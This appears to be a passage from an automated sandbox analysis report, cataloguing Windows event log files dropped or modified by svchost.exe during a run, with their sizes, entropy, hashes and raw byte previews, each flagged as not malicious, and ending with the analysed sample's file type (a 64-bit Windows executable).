                                              SHA-512:C4DF5F19FAFC72BC06DAE0A9477EFD5D80C5841EF436AE687DBFCEE5CB71BD3D6F0D249C6D042E7B7E5CA7966F87DFA627926E18B9EF4619D45A70D9B2BC5DD5
                                              Malicious:false
                                              Preview:ElfChnk.....................................X...............................................................................~..................4.......................\...=...........................................................................................................................f...............?...........................m...................M...F....................................................y......................&....................d..........................................}h......**..............4...{...........>.&.........>.]v0].............A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):3.7635965228288155
                                              Encrypted:false
                                              SSDEEP:384:7h5p+ZpX0WpXbGpXiWpX5upX4CpX/SpXWSpXtmpX8apXj2pXqSpXBqpXA1m1pXn2:7DmROh4
                                              MD5:5EE3B3D4CD249C53E0861788EB8892AD
                                              SHA1:CDC9073766E7385722EF9E77ED1863D2BC8F66AC
                                              SHA-256:1D926FF680074AC2DE211418DD0CDEC183B94BF7781D4DB9C3041C65764BD8A4
                                              SHA-512:7FCE52950C7CF374836CBB1F116F03F54BA560123AECF1F3E50C2B9DAE679138787CD40A591B62CC58EF96170DEF657D3D21249693081FFF766DE86192601DF6
                                              Malicious:false
                                              Preview:ElfChnk......................................e..Hi..........................................................................rJo.........................................:...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................&.......................................................................**................-.|...........>.&.........>.]v0].............A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):3.8010361520578644
                                              Encrypted:false
                                              SSDEEP:384:EhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBq:EwDoh1VpGfVLDZv3
                                              MD5:DF8963A51A00C88E9C586C25969D5190
                                              SHA1:F1E0B4547D5B9E4EC171FFE1A7C021346E79F52B
                                              SHA-256:8F27CDE42098A7769A0423C6A1CE6081A2A77F7B3D6AC1AC9AB59D9ED01096EA
                                              SHA-512:4D9286287D12BD0A58C2805F588812737FF19C4B7D3DB3E385612A32DF856DE46C3A37CA762F638CA592127C2F4DF5A4462A16234C816C5F3296DF148041EFBB
                                              Malicious:false
                                              Preview:ElfChnk.\...............\.......................P............................................................................Jz................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&..................................i...................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.1250907902680094
                                              Encrypted:false
                                              SSDEEP:384:ZhwCCRzCaCkClCzCYC/CyCVCGCMCvCDCIKCeCxCHC:ZKFz
                                              MD5:E1BA3F924C8E8D757F1FC430870194D7
                                              SHA1:642D0A3D281A199479C590C55560A9FA4B026CBB
                                              SHA-256:ED06D9A81F80B28B3B730EA950909B94C02931F98E794E5726430D2C8CDF98E8
                                              SHA-512:7025A0CEEFF9F315367C6A7CE4E3454F1DB8954C823C2829916DC829A4095BAC31EDB2BAA846203FA9D960088C9BE258624AC1752446D488C4FFE1DEA1700D50
                                              Malicious:false
                                              Preview:ElfChnk......................................1..04...+.......................................................................d.o................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................v)................................................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):130936
                                              Entropy (8bit):4.555126061741261
                                              Encrypted:false
                                              SSDEEP:768:cKiD0zBi67fbKYiAEwuGHAnisE3Hi9cwWi4/IiuoQp2KiD0zBi67fbKYiAEwuGHb:TVPaY3BupnUrzgFVPaY3BupnUrzB
                                              MD5:581B5E93969FCFBA031D5089BBD5D51C
                                              SHA1:BF64AE066A652E142620E266EE5B417A5E51DD1F
                                              SHA-256:26D9B4C11AE2A5316BE272CC67C20A1E51D15BBF56447C04A968ED0140C88E08
                                              SHA-512:F351BA987CD2ACC91806248D3F8DEF66BC70C68FC745A7394ED0AF71882101650E4737659B69D11D80DC5B78F29C7913BA7694C1F696DD283C8A2F40814E0AE5
                                              Malicious:false
                                              Preview:ElfChnk..%.......%.......%.......%..........(...............................................................................l...........................................D...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................&......................................................................**..`....%.........`|...........>.&.......................................................................F.....!...A.A..............`|....#..|...@@..|............%...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e..7*...\..C.....M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e./.O.p.e.r.a.t.i.o.n.a.l..................T...'...L....................A..%...D........=.......M.e.s.s.a.g.e.......A..'...D........=.......F.u.n.c.t.i.o.n.......A..#...D........=.......S.o.u.r.c
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 14, DIRTY
                                              Category:dropped
                                              Size (bytes):78368
                                              Entropy (8bit):1.7576947877275884
                                              Encrypted:false
                                              SSDEEP:384:9zhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmtUmZCUmyUkhL6UsE0ZUmxUg:BY7LYJY7LY
                                              MD5:4863A2DCA01E411F7BAF99DA037B8ABF
                                              SHA1:6D4573024AF9D0001F5ACA2F2891F256A3C93DA2
                                              SHA-256:77F4B491E813BF53AD58ADFE1D634E963573504988F23833F4895D85BCEDBEAB
                                              SHA-512:D3DAFB81EB7F3845A65F52DA824037418E368067AE0A27E067BE15A25F0450953D53AA178F7C29E767BC7DC7E9CF7A5AA327CECF753F8D9E9248F09F8CCD15CE
                                              Malicious:false
                                              Preview:ElfFile.........................................................................................................................ElfChnk....................................../...1..Z.......................................................................+7................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................*......................................................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):67776
                                              Entropy (8bit):0.3680680749188651
                                              Encrypted:false
                                              SSDEEP:96:/kdKNVaO8hon/6FgskdKNVaO8hon/6Fg:cd8V7NiFgXd8V7NiFg
                                              MD5:66A26A9E4FF3F03CB0CD4F5CEE0529E4
                                              SHA1:87EC7FC57AB53A4E5CC6AAD39F93451805EAB66D
                                              SHA-256:23B7A497EBC0A106460413D352C7ADB319B489526836E9F35B12646466284AF4
                                              SHA-512:DF144E110C1F9CA7805556F18DF37D4AFDA7D4AFBBF14FEC705CF0320A71926D6DB7D91DAD9C6AFF77B04F09B6F93D77D0F99D3A93FB44458944A1657E1BEF6C
                                              Malicious:false
                                              Preview:ElfChnk..............................................`......................................................................>..8................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................&.......................................................................**..............^..`|...........>.&.........>.]v0].............A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.08846339837245
                                              Encrypted:false
                                              SSDEEP:768:qcvQmqxmknExmT3R8cH7XmfmIcMvq02WgYM9QSp:zmHp
                                              MD5:4333DD3FC3F3AAE9F5128C8A0FFFCBD9
                                              SHA1:2F470A58C7A498098F654A359B044B40FA8DB7EA
                                              SHA-256:E11F6FD91F9F36379DC273DF6126F883BF78CA98B2049D418A573D643F4B226A
                                              SHA-512:5D35DDDFD3356D4AAC0A2E07C5F56A096194B291771A7C07B9CB82E72018790A5E8E4D89A790D73C0C79CFD64F1F4D70C22610C527625C0E8043C34ABE84F741
                                              Malicious:false
                                              Preview:ElfChnk.y...............y...................XY..`[..X."........................................................................E.................!..a.......................=.......................#...................................................................................................f...............?................'......P.......................M...F...........................................................................^0...................................#..........o!.......'..............**......y..........By...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):3.40533568481708
                                              Encrypted:false
                                              SSDEEP:768:FRa8NjaPaHa7aza7aPafbaTaXa/ajabababaDaLaja3avaHaravaraXaza3ava3m:DN+
                                              MD5:77304A5A4F61C4BF5B82EA1A1E8AC7E0
                                              SHA1:822616EEF19BE22973D3282B94C64508965D474E
                                              SHA-256:C230427E768FAB6C2DD22B9AAFB23719AF8C87EE053AE4078494D03B4B392303
                                              SHA-512:E819D1A0DB85C02A56A479A2A7D2F4234D4712CBA2FFE75C4BEE468B8A2657FABBB41DBA5C5D99A9CE64238080D461420F9581B5B78D217328030DD161CE33EF
                                              Malicious:false
                                              Preview:ElfChnk.........@...............@...............`...1op.......................................................................i.................`...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................&...................................9...................................**..H............O|...........>.&.........>.]v0].............A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.3134118906611416
                                              Encrypted:false
                                              SSDEEP:384:WhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJ5XJSXJFgXJ4XJWXJqXJ:WQ0yUkNYwD8imLEvGFogqe
                                              MD5:686B8A7B2E59453E7D68268EBB3F1706
                                              SHA1:2372AA0C460B30CB15247E4E0E32C51C162961D6
                                              SHA-256:AD326E00711B5217FEA1BB8363B22DA007487EFA2F8AB509CA96C92C7C5C40A2
                                              SHA-512:EF1EDEEE2A820BF3AA3FF36CE787793B043165738B9E1EA9B4492FE5A426B6CEC824163BE075CEC83F62C18F376719DDE34C061E26B8DFD643D746E7747A87F2
                                              Malicious:false
                                              Preview:ElfChnk......................................>...A..6Q......................................................................K...................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................3..........................................C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.336920778990042
                                              Encrypted:false
                                              SSDEEP:384:WhsmEm1mgmJmkmhmImKm/mtmPmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfmPQ:WDDcxPG
                                              MD5:56B5B870DF89B66DCE31777458EFCE66
                                              SHA1:0EE8148AE794A0BFAB9A9CD2FDDB0F4EFCAC0C3E
                                              SHA-256:40DE696B80C468111A8D8C8ACAD66AD9376BEB3728F28A8B7F23ED891A186002
                                              SHA-512:260EBB5C9141D2B9513B11B1BA138D12E7F5A6C81566F7B03D2F9800E55306909173A281925AB81CAEE64C16EE8481E8AF1F5532188227F7D850E2375DE85882
                                              Malicious:false
                                              Preview:ElfChnk......................................................................................................................H.................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................s...........................&...............#.......................................................**..p...........u.X.{...........>.&.........>.]v0].............A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.34603412180928
                                              Encrypted:false
                                              SSDEEP:384:ph121A2WN2H2H2t12o2N2sS2D2d2l2R2N2F2t2u2e2+262a2G2e2O2n2r2X272XU:pIN2bbt
                                              MD5:675C79F18F030DF89FC42C90B58B4D2F
                                              SHA1:9B8AC1D8F3D6D4F6658CB041BA1DF7D50192C702
                                              SHA-256:8FBEFCB8527CEB1F4F579DE8CE4332F6BA1AD8336ED5B21AB02F7FCE93FDC163
                                              SHA-512:216B37FA11509D6D3CB3478557FF67A8BD56B3009761DC0DB8B07331E28A856AC09E8C3695D5CC26AF0F3483A5C708D466F47E5B4CBE81A599D3EB724AF2F739
                                              Malicious:false
                                              Preview:ElfChnk.............................................hf.5......................................................................,:................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...............................%...........................................&.......................................................................**...............3A.|...........>.&.........>.]v0].............A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):4888
                                              Entropy (8bit):4.0120839773250925
                                              Encrypted:false
                                              SSDEEP:96:loRhR8Pyz0zx3jkzjR2yGUNSIrRhlKKSeRGAo+57Rpa:l0hRsR5jkzjRrSIrRTxZRpH57RU
                                              MD5:F8B62EE66B2B2974CFEAFF24A0B18165
                                              SHA1:4C3A5127BBB094D1E89B7315971DEC0FC777C051
                                              SHA-256:ED4F3CB3AE76C6C76A456F744AC8F0AA1B269184876AAA95FFD007FC8228DC44
                                              SHA-512:DB4B84F5FDC01C23AACCAD16813F26A157860972798152F8296ACF087E907497D8B4A8ADF8451E6B4F7AB02276955C31841D2112852AB351B8DF58F5D4076BF8
                                              Malicious:false
                                              Preview:ElfChnk.9.......e.......9.......e.....................C....................................................................p.0.................................F.......|...=.......................................`......................u...3...........................................wU......`T..f...h.......TU..?.......................`........U......M.......M...F...!U..............................................9T..............................................9.......9....n..................&...............**......b.........D..............G.n..............................................................<.......T...>.!................@..D......#..|...|`..|.......$...b....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l....s..9...6....s...q.\......&./.......A..#...`...........O.p.e.r.a.t.i.o.n._.T.e.m.p.o.r.a.r.y.E.s.s.S.t.a.r.t.e.d...o....j.....3.h.t.t.p.:././.m
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.260526451615761
                                              Encrypted:false
                                              SSDEEP:384:9cdhdhohUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYT:2BsFpkBBUE
                                              MD5:AA90687DA8FD49B009AA7A2E2E3F8D08
                                              SHA1:501C9EA5D2AAF85C82EB82E3E7C3289D89F6DB4A
                                              SHA-256:2F1E221F743A379AE007DFC31F8027F29B149F5A38B81F33FFE790646EBD40A3
                                              SHA-512:75E6AE300CF83EF056D5A43705A2776FDB66B7131F778820FB732C3ECA1506CE9ED94E02F96F1B5ACE7F8485B0B5BB5357A3837274C5321CA3CBA550A5532ECA
                                              Malicious:false
                                              Preview:ElfChnk.....................................x........k......................................................................C.Q.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................F.......................................................A...............**..H............^...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.2067901678177455
                                              Encrypted:false
                                              SSDEEP:384:0hOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVhVDViZViVFVXD:0yjbgV
                                              MD5:51E3936C667110902BCB747531A47CB2
                                              SHA1:426A3FC03A56B18C23F6D3511E53E87A0158B1B7
                                              SHA-256:BBF7542482481D87C51337502D7A9D32ED4C336C47A0A5848F5D2E4E1376D4B8
                                              SHA-512:9F1CCDE346F431799A463D8848BA2D476892538D02CBD901CA1757012BF12D3444B0024529927A6B1B5B9627377FE4365F063D84EEB5E24D783626941E0417D8
                                              Malicious:false
                                              Preview:ElfChnk......... ............... ............5...7....<........................................................................l................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v...............&*......................................................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.221575081408243
                                              Encrypted:false
                                              SSDEEP:384:9hSBwBy8b5kBwBe6bBwBi8BwB4BwBkBwBRJBwB2BwBfBwBzBwBfYBwBWC/iDRBwJ:9K8bXfjskvFl
                                              MD5:627568605727BBF9442D5E61B3631A4E
                                              SHA1:2D2834A731F0090859E195B62E59132E6B5E4B8E
                                              SHA-256:17138BE62A3FB6FC6C17D91C39458C1FD926BF3548D2531C6298C8A6DABFCDB2
                                              SHA-512:7B22792588F04EEFCFF3659C83459C0AC6B3FC33481E40D0FAFA3051C9A3FDA97FB80D4E1FD93D5FAFB30CAF080296A6AA70C7785ACA6DD00FCF81CC7763B847
                                              Malicious:false
                                              Preview:ElfChnk.....................................PT...W...O=*...................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F....................0...........................#..........................&...................O...................................................**...............Q..|...........>.&.........>.]v0].............A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.4321359184704665
                                              Encrypted:false
                                              SSDEEP:384:BhgUEQUEkUEFUEBzmUEDUEoUEJUEzUEoUEmUEmUEdUEbUEPUEnxUE+UErUEtUEwC:Bcz+aX3io+Ns
                                              MD5:5ACA2E1080FFF733DFE22E7578B87DB1
                                              SHA1:091BA11704D0C15AA8A7A6A4F97245871B7E6021
                                              SHA-256:E38A91E3EE8024C0B964B48665B71213AC67ACBA37161E5C590CFAC9A93EF29A
                                              SHA-512:A6164436C545298E44AC098506DA4F288E6B31073D8E807769F1800EB6D1F89DB908E2B89F79D696234025D7C92B73238B1E32D503F38C57C0F1B3505A1F7C7A
                                              Malicious:false
                                              Preview:ElfChnk.........z...............z...............8....x=.....................................................................'..U................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......q........H......................................................................**.................}z.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):75944
                                              Entropy (8bit):4.210986073784933
                                              Encrypted:false
                                              SSDEEP:384:R0FR+B62M7tYoqRMtsAOoqiMt52moqiMtA0FR+B62M7tYoqRMtsAOoqiMt52moqw:42au2a0OQyWdWwQdwHiEOud9
                                              MD5:B0F9E58CE4E4B68A12963992FF60D0C9
                                              SHA1:5946C14631B7F136DDEEA5A89FE75335BCAA578E
                                              SHA-256:87789E54378180CE41D56E2DCFD9EFF5E1FC4103443430D7948F529A810941EA
                                              SHA-512:EDEE9C393713B04BCCF76057E0EEC43450CECC80F00E998A5728CAD178CE370242B501AF936269097692F8EFE6E46659C63E2719C310D56ED9A655A850F39E00
                                              Malicious:false
                                              Preview:ElfChnk......................................$...(..........................................................................7..................Z...s...h...................=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:...........................&...3.......................................>.......................................................................**...........................\...&.......\......]J.!....?.......A..3...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....\...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):76864
                                              Entropy (8bit):4.392487614772485
                                              Encrypted:false
                                              SSDEEP:384:oFRPW/FRPWjV9kRVEadbuJ0f+1mLFXPhnXgnX3CLfLsLEEb1QBISLngCOTpq8N9E:eSi+thJSy/eOTPDwY3CA
                                              MD5:FCC6FBE00B865F3157ADABD0824CFD4F
                                              SHA1:BBE974AFFDCCD4FFC5F3533A6528965EE6D7844C
                                              SHA-256:5A4E2920C03B07665DF52544AA178338A4D5FA7A03C58856A4BE6ABF708FE207
                                              SHA-512:5509362FB5028E27A6FDEC1472F9D7D6583D7E022C96BBF5BB5DF539D6389A995D01EEC3F1872B8102E0328951AA4A067ED067AD33A7BF8FB447EB1BAE781FA4
                                              Malicious:false
                                              Preview:ElfChnk.................V.......[...................K.......................................................................A.......................s...h...............N...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...................................................&...........................................................................................**......V........................&............|S...r..;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):57824
                                              Entropy (8bit):3.8547158677905276
                                              Encrypted:false
                                              SSDEEP:1536:zQY4dEe8Z06/AuLiFyIGtfb2nuouSXAwat:t
                                              MD5:BBC825076B23B4936B0F5797766BDE1B
                                              SHA1:85BEEBB4A5622A0478BCE315FAE6E8E1CC51BA38
                                              SHA-256:7EBC5AC34E61309F70309C7AE4DEE2F45F81D4A70289F74019B30CF1A417D558
                                              SHA-512:89888B444D8A978230B5B3AAFB4BE5E6A95D9F545C5524C38FD7B73140A44B9D083363DE0FF6863574087842BAF60FF9E5AA0ABA7DB68D79E7D97037D66A5A92
                                              Malicious:false
                                              Preview:ElfChnk.................y...................8........".....................................................................................................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...................................................................&...................................................**......y.........4.............m.&.........m..{T....f...........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............
                                              File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                              Entropy (8bit):7.692419723657324
                                              TrID:
                                              • Win64 Executable (generic) (12005/4) 74.95%
